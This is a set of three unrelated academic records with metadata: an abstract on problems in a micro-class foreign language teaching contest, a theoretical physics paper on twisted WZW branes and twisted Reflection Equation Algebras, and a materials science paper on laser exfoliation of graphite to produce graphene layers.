To ensure students' effective learning and fairness of the contest, the paper lists some problems of MCFLC and offers corresponding solutions. The contestants' problems and solutions are as follows. First, several contestants' micro-classes last too long, and thus the time should be reduced to required criteria. Second, some micro-classes lack a focus, talking extensively. To solve this problem, contestants should elaborate on a point, aiming to solve a single academic problem for their students. Third, some contestants tend to give facts or simple content. Consequently, as teachers they should reflect on their teaching and try to teach something more meaningful by being more creative. Fourth, some contestants take part in the contest for the sole purpose of winning prizes. As to the judges, some of them have adopted casual attitudes or are just unqualified. To change the situation, more responsible judges with high English proficiency are needed. Besides, cross-provincial mutual evaluation and published procedures are also necessary. With the joint effort made by all contestants and judges, MCFLC is sure to have a more promising future. | 2020-05-28T09:15:49.911Z | 2020-05-18T00:00:00.000 | {
"year": 2020,
"sha1": "1ba4c8516c53c8095ab32d85e4bb12cb41149c82",
"oa_license": "CCBY",
"oa_url": "http://www.clausiuspress.com/assets/default/article/2020/05/18/article_1589814910.pdf",
"oa_status": "GOLD",
"pdf_src": "Anansi",
"pdf_hash": "9a455dcd9e83ce1f8c8a1e35c76241fa6fe84dad",
"s2fieldsofstudy": [
"Linguistics",
"Education"
],
"extfieldsofstudy": [
"Political Science"
]
} |
9290977 | pes2o/s2orc | v3-fos-license | Preprint typeset in JHEP style- HYPER VERSION Twisted WZW Branes from Twisted REA’s ∗
Quantum geometry of twisted Wess--Zumino--Witten branes is formulated in the framework of twisted Reflection Equation Algebras. It is demonstrated how the representation theory of these algebras leads to the correct classification and localisation of branes. A semiclassical formula for quantised brane positions is derived and shown to be consistent with earlier string-theoretic analyses.
Introduction.
Branes on group manifolds and quotients thereof have long been at the focus of research efforts aimed at understanding the deformation of classical geometry and gauge dynamics effected by string propagation in background fluxes 1 . While the branes naturally lead to the concept of a curved noncommutative space [2,3], they are still amenable to direct investigation using diverse methods such as the Lagrangian formalism of the associated WZW models [4,5] confining the branes to (twisted) conjugacy classes, effective field theory formulated in terms of the Dirac-Born-Infeld functional [6] proving their stability, matrix models [2,3] providing a semi-classical picture of the geometry and gauge dynamics, renormalisation group techniques [2,3,7,8] capturing brane condensation phenomena, K-theory [7,9,10] classifying their charges and Boundary Conformal Field Theory (BCFT) offering access to their microscopic structure via the boundary state construction.
In the latter approach, (twisted) branes are identified with states in the Hilbert space of the bulk (or closed string) theory implementing (twisted) gluing conditions for chiral currents of the bulk CFT (a is an index of the adjoint representation of the horizontal Lie algebra g ≡ LieG of the Kac-Moody algebra g κ , n enumerates Laurent modes and B is a boundary state label): J a n ⊗ I + ω(I ⊗ J a −n ) |B ≫ ω = 0, (1.1) where ω is an outer automorphism of the current algebra g κ (see, e.g., [11,12]). Thus branes break the full chiral symmetry algebra g L κ × g R κ of the bulk WZW to the subalgebra spanned by annihilators of |B ≫ ω , isomorphic to g κ .
Non-commutative geometry entered the stage thus set in [2] where a matrix model of "fuzzy" physics of untwisted branes was explicitly derived in the large volume (or, equivalently, large level κ) limit. The twisted case was then examined at great length in [3], along similar lines. The semiclassical approach of [2] was later extended in [13] where an Ansatz for brane geometry and gauge dynamics at arbitrary level was advanced, based on the fundamental concept of quantum group symmetry, as suggested by the underlying (B)CFT, and the well-known correspondence between untwisted affine Lie algebras g κ and Drinfel'd-Jimbo quantum algebras U q (g) (see, e.g., [14]). The latter proposal was shown to successfully encode essential (untwisted) brane data such as tensions, localisations, the algebra of functions, internal gauge excitations and interbrane open string modes.
It was also generalised in [15] to a class of orbifold backgrounds, known as simple current orbifolds SU (N )/Z N , whereby the basic structure of the associated matrix model, a so-called Reflection Equation Algebra 2 (REA) REA q (A N ), was examined extensively. The study revealed an attractive geometric picture behind the compact algebraic framework of the REA's, which was next exploited in an explicit construction of some new quantum geometries corresponding to (fractional) orbifold branes. 1 For a review, see: [1]. 2 Cp [16,17,18], see also: the Appendix.
One particular aspect of the non-classical WZW geometry is quantisation of brane locations within G. It can be derived rather straightforwardly from the relative-cohomological constraints on the background fluxes of the relevant Lagrangian boundary WZW model ascertaining welldefinedness of the associated path integral [4]. We shall explicitly refer to some results of the cohomological analysis in what follows.
In this paper, we discuss an algebraic framework relevant to the analysis at arbitrary level of twisted branes on SU (2n + 1) group manifolds. Accordingly, we specialise our exposition to the case g κ = A (1) 2n (in which ω c is the standard Z 2 -reflection of the Dynkin diagram). The exposition is centred on the CFT-inspired notion of twisted quantum group symmetry, as represented by socalled twisted Reflection Equation Algebras (tREA) tREA q (A 2n ). The latter are directly related to quantum algebras U ′ q (so 2n+1 ), with a known representation theory [19,20,21,22,23,24,25].
The U ′ q (so 2n+1 ) are (coideal) subalgebras 3 of U q (su 2n+1 ) -a quantum-algebraic counterpart of the classical subalgebra structure: so 2n+1 ֒→ su 2n+1 [28,29]. Using these facts, we provide evidence of an intricate relationship between twisted boundary states [12,30,31] and the representation theory of the ω c -invariant subalgebra so 2n+1 ∼ = (su 2n+1 ) ωc , and subsequently reconcile our result with the structure of the representation theory of U ′ q (so 2n+1 ) at q a root of unity 4 , embedded in that of U q (su 2n+1 ). We also rederive the quantisation rule for twisted brane positions within the WZW group manifold of SU (3) (originally obtained from cohomological analysis in [32]), whereby we establish -in direct analogy with the untwisted case -a simple geometric meaning of the Casimir operators of tREA q (A 2n ).
Let us now give an outline of the present paper. Section 2. is a warm-up presentation of the classical geometry of the twisted branes. Section 3. discusses chosen features of the twisted Reflection Equation Algebras. Section 4. contains the main results of this work: classification of the twisted branes through the representation theory of the tREA's and a semiclassical derivation of the quantisation rule for brane positions in the SU (2n + 1) group manifold. In the appendices attached, we list further properties of Reflection Equations and the U ′ q (so 2n+1 ) algebras.
Classical geometry of twisted WZW branes.
At the classical level, stable branes of the WZW model in the Lie group target G are described by (twisted) conjugacy classes of the form: with t in the "symmetric" subgroup T ω of the maximal torus T ⊂ G, i.e. t ∈ T with ω(t) = t, whence -in particular -the conjugacy classes are invariant under ω. When G = SU (2n + 1) and ω = ω c 3 Structures of this kind have long been known to arise naturally in the related context of (1 + 1)-dimensional integrable models on a half-line, with involutively twisted gluing condition for chiral symmetry currents at the boundary, cp [26], see also [27]. 4 As dictated by the CFT.
(the case of interest) we may choose complex conjugation ρ as a group-integrated representative of ω, whereby the above reduces to (T denotes transposition) Let K t = {h ∈ G : hth T = t} be the stabiliser subgroup (in the twisted adjoint representation) of t ∈ T ω . For t = I, the stabiliser K t coincides with the group SO(2n + 1). In the algebraic setup to be developed, we shall encounter a quantum deformation of this group (see Sec.3.). Clearly, C ω (t) can be viewed as a homogeneous space 5 : 3) The twisted conjugacy classes are invariant under the twisted adjoint action of the vector subgroup G ∼ = G V ֒→ G L × G R of the group of symmetries of the target manifold, This is a classical counterpart of the symmetry breaking pattern: g L κ × g R κ → g κ mentioned under (1.1). In this context, the distinguished character of the ω-invariant subgroup derives from the fact that a given twisted conjugacy class contains full regular conjugacy classes [32] of all its elements relative the adjoint action of the subgroup G ω ⊂ G, (2.5) The remaining part of the original bulk symmetry, G L ×G R , translates -just as in the untwisted case -into covariance of the ensuing physical model under rigid one-sided translations of twisted conjugacy classes within G, This reflects the residual freedom in the definition of the boundary state consisting in the choice of the inner automorphism twisting the gluing condition [11].
Upon specialising the above presentation to the case of SU (3) for the sake of illustration and preparation for Sec.4.2, we obtain a classification of twisted branes in terms of twisted conjugacy classes in SU (3). For the specific choice of the group-integrated representation of ω given by complex conjugation ρ, we can parametrise the latter as from which it transpires that there are two species of twisted branes in this background: a 5dimensional twisted conjugacy class of the group unit, with a maximal stabiliser, (3), and generic 7-dimensional twisted conjugacy classes which can be regarded as homogeneous spaces SU (3)/SO (2). We shall make an explicit use of the parametrisation (2.7) in the sequel.
Twisted Reflection Equations.
In this section, we shall discuss (quantum) algebras relevant to the description of twisted branes.
The arguments we invoke are of the kind presented in [13], i.e. they are based on the pattern of symmetry breaking induced by twisted branes (cp the discussion of the previous section).
Thus we propose to consider a twisted Reflection Equation (tRE): in which R is a bi-fundamental realisation of the standard universal R-matrix of the relevant quantum group U q (su 2n+1 ) and K − are operator-valued matrices of generators of the twisted Reflection Equation Algebra tREA q (A 2n ) (see: the Appendix).
Equations of this kind (parametrised by additional physical quantities) have long been known to describe couplings of bulk modes to the boundary in (1 + 1)-dimensional integrable models on a half-line, with involutively twisted gluing condition for chiral symmetry currents at the boundary (see [26,27], and the references within). Furthermore, the respective algebraic structures ensuing from (3.1) and its dynamical counterpart from the papers cited share many essential features (coideal property, an intimate relation to the so-called symmetric pairs).
The twisted left-right (co)symmetries [13] of the tRE: K − → t T K − s, realised in terms of (t, s) ∈ G L ⊗ R G R ≡ SU q (2n + 1) ⊗ R SU q (2n + 1) (we have q = e πi/(κ+2n+1) , as indicated by the underlying CFT), provide a quantum version of the classical left-right isometry of the group manifold, which should be a symmetry of the problem (to be broken by branes). There is another tRE with the same symmetry properties, The transformation rule for K + reads K + → (St)K + (Ss) T (S is the antipode of the Hopf algebra SU q (2n + 1)). As we shall discuss in App.A.2 and following [29], the two tRE's define the same quantum algebra U ′ q (so 2n+1 ) [20], a quantum deformation of so 2n+1 . tRE ± differ in the manner the algebra U ′ q (so 2n+1 ) is embedded in them. In view of the prominent rôle played by SO(2n + 1) in the description of twisted A 2n branes (see Sec.2.), the appearance of the latter algebra should be regarded as an encouraging fact.
As it turns out [28], we need both K + and K − to construct Casimir operators for this algebra 6 .
They shall play an important part in our discussion of brane geometries (see Sec.4.2.). The Casimir operators can be cast in the form: where X := K − K + and D := diag(q −2·2n , q −2·(2n−1) , . . . , 1), the latter being straightforwardly related to the antipode S through In the spirit of the papers [13,15], we would like to identify branes with appropriately chosen irreducible representations of the tREA defined above. Further evidence in favour of such an assignment as well as the details of the identification shall be provided in Sect.4. For the present, though, we focus on a particular consequence of this idea: clearly, it should entail the existence of an algebraic counterpart of (2.4). And indeed, the vector part of the G L ⊗ R G R symmetry, realised as possesses the required properties. In addition to preserving the respective tRE's, it also leaves the values of all c m 's unchanged. This follows from the fact that under the above transforma- Next, we turn to the representation theory of (3.1)-(3.2). Recall that tREA q (A 2n ) is related to a particular deformation of so 2n+1 denoted by U ′ q (so 2n+1 ). The representation theory of U ′ q (so 2n+1 ) is known in considerable detail (see, e.g., [20,23].). Here, we are interested only in the highest weight irreducible representations. For q = e πi/(κ+2n+1) , these are of the classical type, with the corresponding highest weights truncated to a fundamental domain in a (κ + 2n + 1)-dependent way outlined below. We adopt labelling by signatures 7 : m = (m 1 , m 2 , . . . , m n ) =: n i=1 m i e i such that all m i 's are integers or all are half-integers, subject to the dominance condition: The truncation scheme has not been worked out in all generality as of this writing. It is known [23] in the simplest case of U ′ q (so 3 ), In the case at hand, i.e. for the deformation parameter q a root of unity, there are -as usual -additional central elements in the algebra, originally discovered in [22]. They shall not be considered in this paper. In particular, for A2 with our subsequent choice of the representation theory, they are known to carry no interesting information [24]. 7 The signatures can readily be expressed in terms of the Dynkin labels of the corresponding weights: 2mi = 2 n−1 j=i λi + λn, (i < n), 2mn = λn. (3.6) and inspection of the algebra U ′ q (so 5 ) and its representations (cp [20]) reveals that the candidate formula is 8 m 1 + m 2 ≤ κ + 5. Thus, it seems plausible that in the general case of irreducible representations of U ′ q (so 2n+1 ) highest weights are truncated as: We shall return to this issue in the next section.
4. Geometry of twisted branes from the tREA.
In the present section, we unravel a number of features of the tREA's introduced, indicating towards an intimate relationship between the latter and twisted branes of the WZW models of type Let us start by recalling that the non-classical geometry of a maximally symmetric WZW brane has been successfully encoded in the representation theory of REA q (g) [13,15]. A crucial rôle in this approach has been played by the map REA q (g) → U q For the tRE, there is a similar embedding of tREA q (A 2n ) ∼ = U ′ q (so 2n+1 ) in U q (su 2n+1 ), with C -a constant (c-number-valued) matrix solution of tRE. In what follows, we take C := diag(c 1 , c 2 , . . . , c 2n+1 ) such that lim q→1 c i = 1, i ∈ 1, 2n + 1. This choice guarantees that in the classical limit, q → 1, (4.1) defines the embedding: in which I i+1,i denote generators of U (so 2n+1 ). The map (4.1) determines a branching of represen- 8 At the threshold, matrix elements of the generators of U ′ q (so5) develop poles. Analogous pathology occurs for U ′ q (so3) and extends to Clebsch-Gordan coefficients, as well as the associated 6j-symbols.
Analogously, the map (4.2) determines the classical counterpart of (4.3). Motivated by the analysis of the untwisted case, as well as by the considerations of [3] and [32] we propose the following identification: Twisted branes correspond to those highest weight irreducible representations of U ′ q (so 2n+1 ) which show up on the right hand side of (4.3), with the branching coefficientb m λ determining the intersection of the untwisted brane described by R λ with the twisted one associated to R m .
The rule has to be supplemented by a truncation of m's (denoted by a tilde in (4.3)), stricter than the one on the highest weight irreducible representations of U ′ q (so 2n+1 ). The truncation is imposed on R m as detailed below. Apart from the truncation, the branching follows the purely classical (q = 1) pattern. It appears that for κ ∈ 2N * one can find a relatively easy algebraic prescription for the truncation 9 by demanding not only that the number of surviving irreducible representations agree with the number of admissible boundary states from the lattice of dominant fractional symmetric affine weights of A 2n (cp [12]), but also that the ensuing distribution of U ′ q (so 2n+1 )-representations over P κ + (A 2n ) possess the Z 2n+1 simple current symmetry of twisted conjugacy classes. It reads and is to be iteratively imposed on the representation theory of U ′ q (so 2n+1 ) which comes with a tensor product structure elucidated in [25].
Here is a description of the procedure leading to (4.3). As the input we use the known [25] fact: b m Λ 1 = δ e 1 m (R Λ 1 and R e 1 are the fundamental representations of U q (su 2n+1 ) and U ′ q (so 2n+1 ), respectively). The procedure is itarative. Let R λ = mb m λ R m be known (we start with R Λ 1 ). In a single step, we tensor R λ with R Λ 1 . On the U q (su 2n+1 ) side, this yields R λ ⊗ R Λ 1 = µ∈P κ + (A 2n ) N µ λ,Λ 1 R µ (N µ λ,Λ 1 are multiplicities). On the U ′ q (so 2n+1 ) side, we get mb m µ R m ⊗ R e 1 . Luckily [25], tensor products of the kind R m ⊗ R e 1 are well-defined 10 and can be decomposed into irreducible components. We may then derive the branching coefficientsb m µ for the irreducible simple summands R µ upon imposing the truncation (4.4). Clearly, we can reconstruct the entire representation theory of U q (su 2n+1 ) over P κ + (A 2n ) in this way, hence we retrieve all the desired intersections. Several comments are well due at this point. First of all, our usage of the quantum algebras should not obscure the fact that the truncation could just as well be imposed in the classical setup (i.e. for so 2n+1 ). The good news is that it can be reconciled with the specific structure of the representation theory of U ′ q (so 2n+1 ) for q a root of unity. Indeed, in consequence of (3.7), the present truncation 2m 1 ≤ κ implies m 1 +m n ≤ 2m 1 ≤ κ < κ+2n+1 and hence it is more restrictive 9 The significance of the parity of κ was emphasised already in [32]. 10 Due to the fact that U ′ q (so2n+1) is a coideal (non-Hopf) subalgebra of Uq(su2n+1) tensoring is problematic in general.
than (3.8). Finally, the representations admitted by (4.3) correspond to those representations of the algebra so 2n+1 which can be integrated to representations of the group SO(2n + 1) [3]. The latter fact shall be of prime relevance to the discussion of the next section.
Let us also note another, rather astonishingly exact correspondence between (4.3) and BCFT.
Namely, we can calculate 11 scalar products of a twisted boundary state |μ ≫ ωc C with all admissible untwisted boundary states |λ ≫ C , whereby we obtain Here, n ωc λ are the so-called twisted fusion rules of the CFT [31] and E(x) denotes the integral part of x. It appears that for even κ the branching coefficients of (4. with the identification between the truncated representation theory of tREA q (A 2n ) and the set of twisted boundary labels given by the mapping: originally proposed in [30] and further discussed in [3]. Thus (4.7) completes our translation of the BCFT data into the quantum-algebraic language of the tREA. Note that it actually associates (through (4.3) and (4.5)) the trivial representation, R 0 , with the dimensionally reduced twisted brane (the one wrapping the twisted conjugacy class of the group unit) as the unique one having a non-vanishing overlap with (i.e. containing) the pointlike untwisted branes localised at the 2n + 1 points in SU (2n + 1) corresponding to the elements of the centre Z(SU (2n + 1)) ∼ = Z 2n+1 . We shall come back to this point in the next section.
Brane localisation from Casimir eigenvalues.
We are not aware of any natural embedding tREA q (A 2n ) ֒→ REA q (A 2n ). Recall that -following [13] -we assign to the latter algebra the rôle of the quantised algebra of functions on the group manifold. Thus, the lack of such a map prevents us from giving a direct geometrical meaning to various quantities associated with tREA's, e.g. to their Casimir operators. Luckily, the situation is not hopeless. We may employ (4.1) and the map REA q (A 2n ) → U q (su 2n+1 ), (A.8), to construct a map tREA q (A 2n ) → REA q (A 2n ) order by order in the parameter 1/κ, in a manner consistent with the q → 1 limiting procedure described in [13]. Using the above expansion we shall express the quadratic Casimir operator c 1 of tREA q (A 2n ) in terms of the M-variables, that is in terms of solutions to the (untwisted) RE (cp [13,15]). All approximate equalities below are up to terms of higher order in the expansion parameter. We also choose C := I. 11 Details of the relevant BCFT computation leading to (4.5) shall be presented in an upcoming paper.
First, note that K ± ii ≈ I for all i ∈ 1, 2n + 1. Hence c 1 ≈ i I + i>j K − ij K + ji . Upon subtracting the trivial part, we then definec We also have K − ij ≈ j≤k≤i L + ki L − kj and K + ji ≈ j≤k≤i SL + ik SL − jk . Using the results from App.D of [15] we list the relevant (leading) terms of the L ± -operators: with E ij defined as in [15] (their explicit form is not relevant here). The above yield and -since M ij ≈ λE ji for i = j -we conclude that At this stage, we may already evaluate the Casimir operator on a particular irreducible representation R m of tREA q (A 2n ). Thus we rewrite the left hand side after [20,21] in terms of components of the signature vector m labelling the irreducible representation chosen, whereby we obtaiñ M. This conforms with the known results for the dimensionally reduced brane [9] to which we consequently associate the zero U ′ q (so 2n+1 )-signature, consistently with our microscopic analysis.
Equivalently, from the (co)isometry (3.5) of irreducible representations of U ′ q (so 2n+1 ) we conclude that the geometry defined by R 0 is encoded in the twisted SU q (2n+1)-comodule algebra: C → s T Cs and therefore it describes the twisted (quantum) conjugacy class of the group unit. 12 Note that (3.8) does not guarantee the uniqueness.
It turns out that we may extract further information from the semiclassical result (4.12)-(4.13), whereby we gain some insight into its physical meaning. To these ends we specialise the formulae to the simplest physically relevant 13 case: n = 1. Plugging into (4.12) the explicit classical parametrisation (2.7) of twisted conjugacy classes of G = SU (3), and comparing with (4.13) we get the relation: where -as previously -λ 1 = 2m 1 ∈ N [20]. We can regard (4.15) as a quantisation condition for brane positions.
Clearly, the above rule retains its validity for λ 1 = 0, hence we may expect it to be generally applicable in the large κ limit.
The significance of the classical limit (4.16) of our quantum-algebraic result follows from the fact that it is amenable to direct comparison with the data on twisted brane localisation which can be found in the literature 14 . Thus we compare (4.16) with the relative-cohomological analysis of [32], using the same group-integrated representative of ω c as the one quantised by the tRE's (3.1)-(3.2). The analysis yields a quantisation rule: which falls in perfect agreement with (4.16) (for even κ) and, consequently, lends support to our proposal. Indeed, upon restricting in (4.13) to integer-spin irreducible representations of U ′ q (so 3 ), the two quantisation formulae become fully equivalent. The latter representations, on the other hand, are precisely the ones that appear in (truncated) branchings of the irreducible representations of REA q (A 2 ) used in [15] in the description of untwisted branes, as determined by (4.3).
Summary and conclusions.
In the present paper, we have discussed a class of quantum algebras, the twisted Reflection Equation Algebras tREA q (A 2n ), in reference to twisted boundary states of WZW models for the 13 The classical SU (2) has no non-trivial diagram automorphisms. 14 As for exact BCFT data of, e.g., [9] it unavoidably becomes obscured by the conventions adopted in the original papers. They differ from ours in the choice of the representative of the class of automorphisms implementing the Dynkin diagram reflection on the group level.
groups SU (2n + 1) and the associated brane worldvolumes wrapping (classically) twisted conjugacy classes within the group manifolds. The framework, developed as a straightforward extension of the previous constructions for untwisted WZW branes, based on the untwisted Reflection Equation Algebras REA q (A 2n ), is a novel proposal for a compact algebraic description of the twisted branes.
Our study provides several arguments in favour of its profound relationship to the CFT of twisted the truncation is identical with the one suggested in [30] in the BCFT context.
In conclusion, we believe that there are sound reasons to regard the tREA's as natural building blocks of quantum-algebraic matrix models for twisted branes on the SU (2n + 1) WZW manifolds.
While encouraged by the results obtained hitherto, we are aware of numerous questions that our study leaves unanswered, such as the harmonic analysis on the associated geometries, and the gauge dynamics of twisted WZW branes that the algebras are claimed to describe. We intend to return to them in a future publication.
In this appendix, we discuss chosen properties of three RE's: appearing in the paper. In the formulae above, R is a bi-fundamental realisation of the standard universal R-matrix of the relevant quantum group U q (su 2n+1 ), R ≡ (R V ⊗ R V ) (R), satisfying the celebrated Quantum Yang-Baxter Equation (see, e.g., [14]). The operator-valued matrix K ∓ (resp. M) generates the twisted (resp. untwisted) Reflection Equation Algebras, tREA q (A 2n ) ∓ (resp. REA q (A 2n )) whose quantum group comodule structure and relation to twisted (resp. untwisted) quantum algebra U ′ q (so 2n+1 ) (resp. U q (su 2n+1 )) shall be discussed in the sequel.
A.1 Symmetries of the RE's and their relation to U q (su 2n+1 ).
The three RE's of interest enjoy the following (twisted) left-right (co)symmetries which are crucial for their applicability in an effective description of branes in WZW models (S is the antipode of the Hopf algebra SU q (2n + 1)): where R 12 s 1 s 2 = s 2 s 1 R 12 , R 12 t 1 t 2 = t 2 t 1 R 12 , R 12 t 1 s 2 = s 2 t 1 R 12 (A. 6) are the defining relations of (two copies of) the quantum group SU q (2n + 1) associated to the R-matrix R.
Solutions to the three RE's under study can straightforwardly be realised in terms of generators of the (extended) quantum universal enveloping algebra U q (su 2n+1 ) through L ± are the familiar FRT-operators [18]. The existence of the homomorphisms thus defined enables us to use the well-known representation theory of the quantum algebra U q (su 2n+1 ) to induce a representation theory of the (t)REA's. In particular, the relevant (specialised) representation theory of U q (su 2n+1 ) has been studied at some length in [15].
The twisted quantum orthogonal algebra U ′ q (so 2n+1 ), considered originally by Gavrilik and Klimyk in [19], is defined by the following commutation relations: satisfied by its generators Π i , i ∈ 1, 2n + 1. In the classical limit, q → 1, the above relations reproduce the standard defining relations of U (so 2n+1 ). They differ, on the other hand, from the defining relations of the quantum universal enveloping algebra U q (so 2n+1 ) (of Drinfel'd and Jimbo) associated to the universal R-matrix for so 2n+1 (e.g. [14]).
In addition to the above generators, we define after [28] the operators Π ∓ ji , 1 ≤ i < j ≤ 2n + 1 through: It is then a matter of straightforward algebra to verify that the elements of the two operator-valued solutions to (A.1)-(A.2) provide a realisation of the algebra of Π ∓ ji 's. More precisely, we have the identification: establishing a homomorphism U ′ q (so 2n+1 ) ֒→ tREA q (A 2n ) ∓ . This, together with the explicit mappings tREA q (A 2n ) ∓ → U q (su 2n+1 ), (A.7), embeds U ′ q (so 2n+1 ) in U q (su 2n+1 ) as the so-called coideal subalgebra [29]. Its representation theory, both of classical and non-classical type, has been discussed in great detail in a series of papers [19,20,23,25], also in relation to the representation theory of U q (su 2n+1 ). An important conclusion following from that analysis is that we can effectively restrict to U ′ q (so 2n+1 )-irreducible representations of the classical type as long as we are dealing with classical-type irreducible representations of U q (su 2n+1 ) (branching into the former). | 2014-10-01T00:00:00.000Z | 2004-01-01T00:00:00.000 | {
"year": 2004,
"sha1": "b3dd52313f86f5dcd642deaa56e708d54d2a5b97",
"oa_license": null,
"oa_url": "http://arxiv.org/pdf/hep-th/0412146",
"oa_status": "GREEN",
"pdf_src": "Arxiv",
"pdf_hash": "2b730a02c88a2efacb9546c0efd77b41259ae7a0",
"s2fieldsofstudy": [
"Physics"
],
"extfieldsofstudy": []
} |
22260821 | pes2o/s2orc | v3-fos-license | Laser-Plasma Driven Synthesis of Carbon-Based Nanomaterials
In this paper we introduce a laser-plasma driven method for the production of carbon based nanomaterials and in particular bi- and few-layers of Graphene. This is obtained by using laser-plasma exfoliation of amorphous Graphite in a liquid solution, employing a laser with energy in the order of 0.5 J/mm2. Raman and XPS analysis of a carbon colloidal performed at different irradiation stages indicate the formation of Graphene multilayers with an increasing number of layers: the amount of layers varies from a monolayer obtained in the first few seconds of the laser irradiation, up to two layers obtained after 10 s, and finally to Graphite and amorphous carbon obtained after 40 s of irradiation. The obtained colloidals are pure, without any presence of impurities or Graphene oxides, and can easily be deposited onto large surfaces (in the order of cm2) for being characterized or for being used in diverse applications.
M. Barberio & P. Antici
In this paper we introduce a laser-plasma driven method for the production of carbon based nanomaterials and in particular bi-and few-layers of Graphene. This is obtained by using laser-plasma exfoliation of amorphous Graphite in a liquid solution, employing a laser with energy in the order of 0.5 J/mm 2 . Raman and XPS analysis of a carbon colloidal performed at different irradiation stages indicate the formation of Graphene multilayers with an increasing number of layers: the amount of layers varies from a monolayer obtained in the first few seconds of the laser irradiation, up to two layers obtained after 10 s, and finally to Graphite and amorphous carbon obtained after 40 s of irradiation. The obtained colloidals are pure, without any presence of impurities or Graphene oxides, and can easily be deposited onto large surfaces (in the order of cm 2 ) for being characterized or for being used in diverse applications.
Graphene is one of the most promising materials for nanoscience applications [1][2][3] . This simple 2-D material, composed of a single layer of carbon atoms, is characterized by high electron mobility and a field-generated band gap, therefore, it is defined as a zero-gap semiconductor 4 . Nevertheless, technological applications that take advantage of Graphene electronic transport properties require structurally coherent Graphene on a large scale (e.g. wafer scale), or large arrays of Graphene flakes positioned with a unique azimuthal orientation on a substrate.
In the last decades, many preparation processes have been suggested in order to improve the quality of Graphene and its properties. The first method was the mechanical exfoliation from Graphite proposed in 2004 4 , which -being a low-budget technique -strongly contributed to arousing interest for Graphene. However, the produced Graphene flakes have irregular shapes and a random azimuthal orientation. Currently, Chemical Vapor Deposition (CVD) on transition metal substrates [5][6][7] can produce the best quality Graphene. In particular, Graphene obtained with CDV deposited on copper foils forms large uniform layers. Nonetheless, the electrical properties of CVD Graphene cannot be tested on a metal substrate, since the testing requires a transfer process of the Graphene layer onto an appropriate insulating substrate. The transfer process often affects the Graphene integrity, its properties, and thus the overall performance: Wrinkle formation, impurities, Graphene tearing, and other structural defects can occur during the transfer. Moreover, CVD Graphene grown on substrates has its size limited by the reactor size, which restricts a large-scale production. Alternative methods for the production of Graphene are epitaxial growth on metal surfaces or graphitization of hexagonal SiC 8,9 . In all these cases, the quality of Graphene is strictly related to the substrate properties such as size, crystallinity, purity, since, similarly to the CVD, these production processes require a transfer.
In addition to these processes, recently also laser-driven methods for the synthesis of nanomaterials were proposed as alternative to chemical techniques 10 . The most employed laser method is the Laser Ablation, which can be performed in vacuum, controlled gaseous atmosphere, or in liquid (Laser Ablation Synthesis in Solution -LASiS). Laser methods allow having a precise control in the dimensions and shapes of the produced nanomaterials, with an in-situ tuning of the material properties being possible by simply changing the laser and plasma characteristics. While these methods are efficiently used for the synthesis of nanoparticles and quantum dots 11,12 , the high temperatures and pressures reached on the generated plasma prevent their use in the Graphene synthesis. Higher temperatures can induce the amorphization of the carbon structures leading to a complete loss of the hexagonal lattice.
In the following, we propose a simple method for the large-scale production of colloidal solution of Graphene flakes based on the interaction between a higher power laser beam (power of about 100 MW) and a material bulk. The technique (see Fig. 1) is based on the exfoliation of an amorphous Graphite sample located in a liquid solution by using a high power laser irradiation. The laser-carbon interaction in a liquid solution thermalizes the system, preventing to reach the melting temperature. The exfoliated carbon layer is suspended in the solution
Materials and Methods
The Laser Exfoliation Method. Our Graphene growth method is based on the laser exfoliation (LE) of amorphous Graphite, realized by using an experimental method that is typically employed in the conventional Laser-method for nanomaterials synthesis, the "Laser Ablation Synthesis in Solution" (LASiS). The preparation of Graphene flakes using LE has the advantage of not requiring vacuum conditions (similarly to CVD or Epitaxial growth), and as such allows achieving layers with higher purity produced in diverse solutions (permitting to choose the solution which is most suitable for the applications). In our experimental setup, a Graphite plate, with nominal purity of 99.99% and dimensions of about 1 cm × 1 cm, is placed on the bottom of a vessel cuvette containing an aqueous solution of acetone (90%). We chose as solvent acetone (oxygen-free ambient) for preventing the oxidation of nanoflakes during the synthesis process and the formation of Graphene oxide. The plate is ablated with the second harmonic (532 nm) of a pulsed YAG:LASER. The laser spot size on the target surface is of about 1 mm 2 . The laser fluence is about 0.5 J/pulse (with a pulselength of 7 ns). The laser source used for the LE reaches the target from the top surface of a cuvette. The colloidal solution, produced at different irradiation times, is transferred to a copper surface by drop-casting and heated in air up to 70 °C for solvent evaporation. Analytical characterization of each deposited drop was performed by morphological (AFM-SEM) and chemical (RAMAN and XPS) information. Differently from the classical Laser Ablation technique employed for the synthesis of nanoparticles, where the approach is typically bottom/up (i.e. atoms nucleate producing nanoparticles), the physical phenomena involved in the LE can be attributed to both, a top/down and a bottom/up approach: When the laser irradiates the carbon surface, it generates (similarly as for the generation of nanoparticles) different phenomena such as the detachment of single carbon atoms (which aggregate in amorphous carbon particles (bottom/up approach)), and the exfoliation of a single or multi-layer of Graphene (top/down approach). All these detached materials are distributed in the plasma plume and are dispersed in the colloidal solution. While the multi-layer of Graphene stays suspended in the colloidal solutions, the carbon atoms aggregate producing amorphous microparticles.
Morphological analysis of the colloidal drops deposited onto a silicon surface indicates the presence of Graphene bi-and multi-layer and of amorphous carbon aggregates generated by the aggregation of single atoms detached during the laser irradiation. Nevertheless, the amount of the Graphene multilayer or the amorphous aggregates changes with irradiation time, indicating that the two phenomena (particle synthesis and Graphene exfoliation) occur at different stages. The presence of amorphous carbon in the solution is higher after the first 10 s of irradiation, clearly indicating that the breaking of the interlayer bonding is the predominant phenomenon in a first phase of the laser irradiation while this effect (the breaking) becomes negligible respect to the amorphous aggregation in the second phase. The colloidal solution is finally deposited by drop cast on a conductive glass substrate and the film is heated in air to about 50 °C for facilitating the solvent evaporation. The deposited layer is analysed in order to check the possibility of producing very large substrates covered with our produced Graphene multilayers and to test the electrical and optical properties. XPS measurements are conducted in a UHV chamber equipped for standard surface analysis with a pressure in the range of 10 −9 torr. Non-monochromatic Mg-Kα X-rays (hν = 1253.64 eV) are used as excitation source. The XPS spectra are calibrated with the C1s peak of a pure carbon sample (energy position located at 284.6 eV). All XPS spectra are corrected for analyzer transmission and the background is subtracted using the straight-line subtraction mode. Moreover, the XPS data are fitted assuming a Gaussian distribution. Finally, the KLL Auger structure of carbon is analyzed in a Derivative mode for evaluating the D parameter. The Raman measurements are taken by a Raman Microscope (Thermo Fisher DXR), equipped with a 532 nm laser and a spot size with a resolution of 1 micron. The spectra are obtained with a 50 × objective (focal length of 15 mm). The spectral resolution, by using the 1800 grooves/mm grating, was estimated to be better than about 2 cm −1 . Each micro-Raman spectrum was collected in 20 s and three accumulations.
